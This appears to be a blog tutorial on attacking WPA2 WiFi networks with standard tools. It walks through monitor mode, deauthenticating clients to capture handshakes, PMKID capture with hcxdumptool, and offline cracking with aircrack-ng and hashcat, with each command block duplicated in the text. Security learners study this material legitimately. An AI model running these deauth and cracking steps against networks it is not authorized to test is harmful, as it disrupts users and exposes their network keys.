July 13, 2026
Stop Wasting Money on WiFi Adapters — Use What You Already Have
All techniques in this article were performed against my own home network in a controlled lab environment. This is for educational purposes…

By Arsh
3 min read
All techniques in this article were performed against my own home network in a controlled lab environment. This is for educational purposes — always get explicit authorization before testing any network you don't own.
When I started learning WiFi hacking, every tutorial I found insisted on buying an external adapter — usually the ALFA AWUS036NHA. Because of that, my learning had a bottleneck: I believed that without an external WiFi adapter, I simply couldn't start learning WiFi hacking at all.
It took me a while to realize that assumption was wrong — most modern internal WiFi cards absolutely can do monitor mode. You just have to know how to enable it.
Here's the setup I used, no external hardware involved.
Step 0 — Get Kali Real Hardware Access
A common mistake is running Kali inside a VM and then wondering why monitor mode won't work — VMs often can't pass through the internal WiFi card properly.
To get real hardware access, I first installed Kali Linux on a USB pendrive and booted my PC directly from it. This gives Kali direct access to the internal WiFi hardware, the same way a full dual-boot install would (dual boot works just as well if you'd rather install Kali permanently).
Step 1 — Check Your Interface and Driver Support
iwconfig
# or
ip link showiwconfig
# or
ip link showThis lists your wireless interface (usually wlan0).
Step 2 — Kill Interfering Processes
sudo airmon-ng check killsudo airmon-ng check killStep 3 — Enable Monitor Mode
sudo airmon-ng start wlan0sudo airmon-ng start wlan0Step 4 — Verify
iwconfigiwconfigYou should now see Mode:Monitor on your interface (often renamed to wlan0mon).
Capturing the 4-Way Handshake with Aircrack-ng
Once your card is in monitor mode, we can start capturing the WPA2 4-way handshake — the exchange that happens when a client authenticates to an access point (AP). With Aircrack-ng we can capture it and crack it offline.
Step 1 — Discover Nearby Networks
sudo airodump-ng wlan0monsudo airodump-ng wlan0monScan all networks, not just 2.4 GHz:
sudo airodump-ng --band abg wlan0monsudo airodump-ng --band abg wlan0monNote the target's BSSID, channel, and ESSID (I ran this against my own home WiFi AP).
Step 2 — Focus Capture on the Target
sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0monsudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0monThis locks onto the target and starts writing packets to capture-01.cap.
Step 3 — Force a Handshake (Deauth a Connected Client)
sudo aireplay-ng --deauth 0 -a <BSSID> -c <client_MAC> wlan0monsudo aireplay-ng --deauth 0 -a <BSSID> -c <client_MAC> wlan0monThis kicks a connected client off briefly, forcing a reauth — which is exactly when the 4-way handshake gets sent, and exactly what airodump-ng is listening for. You'll see WPA handshake: appear in the terminal once captured.
Using --deauth 0 sends continuous deauth packets until you stop it manually (Ctrl+C). You can also use 1 for a single burst or 2 for two bursts if you want something less aggressive.
Step 4 — Crack the Handshake
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txtaircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txtIf the password's in your wordlist, aircrack-ng brute-forces the PSK against the captured handshake and shows you the key.
Automating with Wifite
Doing this manually is great for understanding the mechanics, but once you get it, wifite wraps the entire workflow — scanning, targeting, deauthing, capturing, and cracking — into one command:
sudo wifite --killsudo wifite --killIt auto-detects nearby WPA/WEP networks, handles deauth and handshake capture automatically, and even runs the wordlist crack at the end. Great for quickly testing multiple APs without manually chaining commands each time.
The Client-Less Attack: PMKID (No Deauth Required)
Deauth attacks are noisy — they're logged, they can trip IDS/WIPS alerts, and they rely on a client being actively connected.
The PMKID attack skips all of that. Many routers embed the PMKID in the very first EAPOL frame of the RSN handshake, meaning you can sometimes grab what you need directly from the AP itself — no client interaction, no deauth packets sent at all.
Step 1 — Stop Interfering Services
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.servicesudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.serviceJust like with the airmon-ng check kill step earlier, these background services will interfere with hcxdumptool's raw access to the interface, so they need to be stopped first.
Step 2 — Capture Traffic with a Live Scan
sudo hcxdumptool -i wlan0mon -w capture.pcapng --rds=3sudo hcxdumptool -i wlan0mon -w capture.pcapng --rds=3--rds=3 enables a rolling live scan across channels, requesting PMKID data from nearby APs as it hops. Output is written straight to capture.pcapng.
Note: Since
--rds=3is cycling through channels, this can take a few minutes to hours depending on how many APs are nearby — let it run rather than assuming it's stuck.
Step 3 — Convert to a Crackable Hash Format
hcxpcapngtool -o hash.hc22000 capture.pcapnghcxpcapngtool -o hash.hc22000 capture.pcapngThis extracts the PMKID and formats it into hashcat's .hc22000 hash format.
Step 4 — Crack It with Hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txthashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txtMode 22000 is the unified WPA-PBKDF2-PMKID+EAPOL format — it handles both PMKID and full handshake cracking in one mode.
Step 5 — Restart Services
sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.servicesudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.serviceNext on my list: WPA3/SAE attacks, since PMKID and standard 4-way handshake attacks don't fully apply there.
If you found this useful, drop a clap 👏